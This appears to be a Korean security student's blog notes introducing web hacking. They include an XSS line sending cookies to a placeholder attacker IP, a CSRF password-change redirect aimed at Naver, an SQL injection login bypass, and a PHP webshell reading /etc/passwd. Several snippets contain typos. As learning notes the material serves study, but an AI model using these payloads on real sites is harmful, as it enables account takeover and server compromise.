파이썬웹해킹 시작

2020. 12. 1. 09:08·Web hacking

document.location=http://해커ip/cookie=?document.cookie

 

csrf 크로사이트 요청 위조

 

 

 

피해자의 아이디는 알지만 비밀번호는 몰라.그래도 로그인 하고싶다.

 

피해자의 계정 비밀번호를 내가원하는 값으로 바꾸게 하자.

 

 

 

요청위조

 

내pc에서 내 비밀번호를 바꿔보니 정상적인 요청은 다음과 같다.

 

www.naver.com/account.jsp?passwd=ksdfgy849

 

 

 

 

 

 

 

 

https://nid.naver.com/user2/help/myInfo.nhn?m=viewChangePasswd&lang=ko_KR&pass=034848dw4qddqd

pass=~~~~이걸추가하면

비밀번호가 초기화 되더라

 

<script>

location.htef=https://nid.naver.com/user2/help/myInfo.nhn?m=viewChangePasswd&lang=ko_KR&pass=034848dw4qddqd

</script>

 

 

ㅇ이걸 사용자가 실행을하면 비밀번호가 바뀜

비밀번호를 변경하는 요청(url)을 피해자가 실행하게 만든다.

 

 

 

 

jason

jason1234

 

 

 

웹서버 : select * from account where id="and pass="

db서버: select * from account where id='jason and pass='jason1234'

조회되는 값이 1개 이상이라도 있으면 인증 성공

 

 

jason

' or 1=1--

 

 

 

웹서버 : select * from account where id="and pass="

db서버: select * from account where id='jason and pass=''or 1=1--'

 

 

 

---------------------------------------------------

웹셸 업로드*

 

 

php서버

 

webshell.php

<?

passthru[get(cmd)]

?>

 

 

브라우저

www.naver.com/bbs?id=300&file=webshell.php&cmd=cat /etc/passwd

www.naver.com/bbs?id=300&file=webshell.php&cmd=ifconfig

 

이런식으로 웹 브라우저에서 보이게됨!

 

 

 

 

 

 

 

http 는 stateless -cookie

연결자동으로끊김

 

 

 

 

 

로그인을하면 3 way handshaking 연결

쿠키를 생성

4 way handshaking 연결 끊는다

 

자동연결끊김.

 

 

 

 

 

-------------------------------------------------------------

 

arp 캐쉬메모리삭제.

 

netsh interface ip delete arpcache

 

arp -a

 

'Web hacking' 카테고리의 다른 글

웹해킹 파일업로드 취약점  (0) 2020.12.01
csrf(크로스사이트 요청위조),좀비  (0) 2020.12.01
웹해킹시간 제로보드취약점 기존스크립트유지  (0) 2020.12.01
웹해킹.kr 버프슈트 intruder 자동 회원가입등, sqlmap,제로보드 취약점  (0) 2020.12.01
웹해킹 ( beebug,xss공격,beef툴,setoolkit,사용자계정탈취)  (0) 2020.12.01
'Web hacking' 카테고리의 다른 글
  • csrf(크로스사이트 요청위조),좀비
  • 웹해킹시간 제로보드취약점 기존스크립트유지
  • 웹해킹.kr 버프슈트 intruder 자동 회원가입등, sqlmap,제로보드 취약점
  • 웹해킹 ( beebug,xss공격,beef툴,setoolkit,사용자계정탈취)
taktaks
taktaks
보안 연습 일기장입니다. 모든 연습은 불법적인 용도로 사용하지 말아주시길 부탁드립니다. 용무는 wndudxkr2005@gmail.com 메일 부탁드립니다.
  • taktaks
    taktaks
    taktaks
  • 전체
    오늘
    어제
    • 보안 일지 (280)
      • 네트워크 구축 (12)
      • 리눅스 보안구축 (10)
      • 파이썬 기본 (11)
      • Web hacking (39)
      • 통합 인프라 보안 (41)
      • 공격기법 및 탐지 (33)
      • 악성코드 및 포렌식 (93)
      • 리버싱 (5)
      • 시스템 해킹 (20)
      • C 언어 (12)
  • 블로그 메뉴

    • 링크

    • 공지사항

    • 인기 글

    • 태그

      프롯
    • 최근 댓글

    • 최근 글

    • hELLO· Designed By정상우.v4.10.3
    taktaks
    파이썬웹해킹 시작
    상단으로

    티스토리툴바